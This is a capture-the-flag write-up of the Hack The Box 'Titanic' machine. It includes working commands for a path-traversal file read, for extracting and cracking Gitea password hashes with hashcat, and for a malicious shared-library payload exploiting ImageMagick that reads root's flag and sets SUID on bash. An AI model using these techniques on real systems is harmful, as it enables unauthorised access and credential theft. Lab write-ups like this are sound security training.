Titanic (HTB)

Let's ride the Titanic but survive this time.

Enumeration.

Port Scanning.

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGZG4yHYcDPrtn7U0l+ertBhGBgjIeH9vWnZcmqH0cvmCNvdcDY/ItR3tdB4yMJp0ZTth5itUVtlJJGHRYAZ8Wg=
|   256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDT1btWpkcbHWpNEEqICTtbAcQQitzOiPOmc3ZE0A69Z
80/tcp open  http    syn-ack Apache httpd 2.4.52
|_http-title: Titanic - Book Your Ship Trip
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
|_http-favicon: Unknown favicon MD5: 79E1E0A79A613646F473CFEDA9E231F1
| http-server-header: 
|   Apache/2.4.52 (Ubuntu)
|_  Werkzeug/3.0.3 Python/3.10.12
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumerate Web.

So once we enter the website we see few links and booking functionality.

Once we fill this form we will get JSON file downloaded into our machine containing the information about the ticket.

Enumerate directories.

Using dirsearch we can find few directories we can test.

We see the book which appear related to that form and download which gives 400 meaning bad request let check it with Burp Suit.

It should take Ticket as GET parameter.

Interesting simple LFI. We get the passwd file and we can see user called Developer.

SSH as developer.

Gitea.

After i found the user and the LFI i tried looking for configuration files and ssh keys but no luck then using ffuf i was able to find this.

Gitea is an open-source, self-hosted Git service that's similar to GitHub. It allows developers to manage their Git repositories on their own servers, offering features like issue tracking, pull requests, and project management in a lightweight and easy-to-set-up package.

After a bit of search i found that has a database under the following path gitea/data/gitea.db. Let's use CURL to get it.

curl http://titanic.htb/download\?ticket\="../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output sql

Once we get it we can use sqlite3 to check the database.

Not let's try to crack these.

After a bit of search i came across this writeUp.

HTB: Compiled0xdf hacks stuff

Which explain how to crack gitea passwords as it use pbkdf2-sha algorithm.

Bash

sqlite3 <Your SQL NAME> "select passwd,salt,name from user" | while read data; do digest=$(echo "$data" | cut -d'|' -f1 | xxd -r -p | base64); salt=$(echo "$data" | cut -d'|' -f2 | xxd -r -p | base64); name=$(echo $data | cut -d'|' -f 3); echo "${name}:sha256:50000:${salt}:${digest}"; done | tee gitea.hashes

Using this command we can get the hashes as hashcat understand it and then we crack it with hashcat.

hashcat gitea.hashes ../../Downloads/rockyou.txt --user

After a bit we can see this.

Cool now we have valid creds let's SSH.

Shell as Root.

So as for root shell once i get into the machine there a lot of things to look at.

1

Enumerate the docker-compose files

I have enumerated the docker-compose files one of them was interesting which that allow for ssh on port 2222 i tried to plan ssh key into the /data but no luck

2

Check the website running on port 3000

I have enumerated too the website running on port 3000 gitea but nothing actually was there but some commits about the book system./

3

Finally something interesting occur. !!!

When i was checking the files around the system i came across this file under /opt/scripts.

Which contain some bash script.

cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log

At first glance this script seems to fine but !. If we check the version of magick that is running we can find more info about it :).

some google we can find this.

Arbitrary Code Execution in `AppImage` version `ImageMagick`GitHub

Basically the issue is in how the ImageMagick handles the dynamic link libraries allowing for dynamic library injection which allow use to execute any command as privilege as ImageMagick executed.

Using this simple Payload inside the image directory where it search for the images.

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void init(){
    system("cat /root/root.txt > /tmp/rootflag");
    exit(0);
}
EOF

now just change anything in the file to trigger the bash script.

cp home.jpg home2.jpg

Then just check the tmp to get your flag.

Additional info.

for the sake of curiosity i wanted to get root shell not just read the flag. Which is an easy task we just need to find a way to allow use to access shell as root.

We can change the permissions of the bash executable to include sudo bit which allow us to execute the binary as we are the owners of it.

Here is the updated code that do that.

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void init(){
    system("chmod 4777 /usr/bin/bash");
    exit(0);
}
EOF

But be careful if you just executed it as it is it will not give you root shell.

As we can see we are not root this is because linux by defaults drops the permissions to the normal user for security reasons. We can use -p flag to disable that.